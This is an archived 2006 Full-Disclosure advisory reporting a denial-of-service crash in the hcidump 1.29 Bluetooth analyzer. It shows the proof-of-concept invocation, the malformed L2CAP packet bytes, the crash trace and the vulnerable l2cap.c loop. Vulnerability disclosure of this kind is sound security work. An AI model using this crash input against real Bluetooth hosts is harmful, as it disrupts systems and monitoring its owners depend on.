lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Mon, 06 Feb 2006 17:54:55 +0100
From: Research Infratech <research@...ratech.fr>
To: dailydave@...ts.immunitysec.com,  bugtraq@...urityfocus.com, 
	full-disclosure@...ts.grok.org.uk
Subject: [ Secuobs - Advisory ] Bluetooth : DoS on hcidump
	1.29 + PoC


[Software affected] hcidump

[Version] 1.29 (may be other)

[Impact] Denial of Service (may be more)

[Credits] Pierre Betouin - pierre.betouin@...ratech.fr - Bug found with BSS v0.6 GPL fuzzer (Bluetooh Stack Smasher) 

BSS could be downloaded on http://www.secuobs.com/news/05022006-bluetooth10.shtml

[Vendor] was notified

[Original advisory]

http://www.secuobs.com/news/05022006-bluetooth9.shtml#english
http://www.secuobs.com/news/05022006-bluetooth9.shtml#french

[PoC] download it on http://www.secuobs.com/news/05022006-bluetooth8.shtml

[PoC usage]

# ./hcidump-crash 00:80:09:XX:XX:XX
L2CAP packet sent (15)
Buffer: 08 01 0B 00 41 41 41 41 41 41 41 41 41 41 41

# hcidump
HCI sniffer - Bluetooth packet analyzer ver 1.29
device: hci0 snap_len: 1028 filter: 0xffffffff
< HCI Command: Create Connection (0x01|0x0005) plen 13

> HCI Event: Command Status (0x0f) plen 4
> HCI Event: Connect Complete (0x03) plen 11

< HCI Command: Write Link Policy Settings (0x02|0x000d) plen 4
< ACL data: handle 41 flags 0x02 dlen 19
    L2CAP(s): debug : code=8
Echo req: dlen 12
    L2CAP(s): debug : code=0
code 0x00 ident 0 len 0
(...)
    L2CAP(s): debug : code=0
code 0x00 ident 0 len 0
segmentation fault

[Affected code location] l2cap.c

[Affected code]

while (frm->len >= L2CAP_CMD_HDR_SIZE) {
    if (!p_filter(FILT_L2CAP)) {
        p_indent(level, frm);
        printf("L2CAP(s): ");
    }

    switch (hdr->code) {
    l2cap_cmd_hdr *hdr = frm->ptr;
    frm->ptr += L2CAP_CMD_HDR_SIZE;
    frm->len -= L2CAP_CMD_HDR_SIZE;
    (...)
    default:
        if (p_filter(FILT_L2CAP))
            break;
        printf("code 0x%2.2x ident %d len %d\n",
            hdr->code, hdr->ident, btohs(hdr->len));
            raw_dump(level, frm);
    }
    frm->ptr += btohs(hdr->len);
    frm->len -= btohs(hdr->len);

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ